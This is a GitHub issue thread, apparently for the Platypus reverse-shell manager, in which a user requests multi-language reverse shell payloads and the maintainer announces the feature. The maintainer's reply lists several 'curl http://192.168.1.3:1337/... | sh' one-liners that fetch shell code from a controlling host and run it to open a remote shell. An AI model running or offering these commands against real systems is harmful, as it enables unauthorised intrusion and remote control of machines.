Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Feature Request] 多语言反弹 shell 支持 #30

Closed
RicterZ opened this issue Jan 22, 2021 · 3 comments
Closed

[Feature Request] 多语言反弹 shell 支持 #30

RicterZ opened this issue Jan 22, 2021 · 3 comments

Comments

@RicterZ
Copy link

RicterZ commented Jan 22, 2021

比如 curl platypus:8080/a.py 就返回 python 的反弹 shell 代码,.../a.pl 就返回 perl 的。

@WangYihang
Copy link
Owner

诶好主意!感谢反馈!俺等会儿整一下,rr 师带带我 >v<

@WangYihang
Copy link
Owner

WangYihang commented Jan 23, 2021

Added. @RicterZ ,感谢师傅提出建议!
Examples:

curl http://192.168.1.3:1337/ | sh
curl http://192.168.1.3:1337/bash | sh
curl http://192.168.1.3:1337/python | sh
curl http://192.168.1.3:1337/perl | sh
curl http://192.168.1.3:1337/1.2.3.4/7331 | sh
curl http://192.168.1.3:1337/1.2.3.4/7331/bash | sh
curl http://192.168.1.3:1337/1.2.3.4/7331/python | sh
curl http://192.168.1.3:1337/1.2.3.4/7331/php | sh

All available language templates are stored at lib/template/rsh

RaaS support specifying a language

@WangYihang
Copy link
Owner

v1.2.6 released for this issue.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants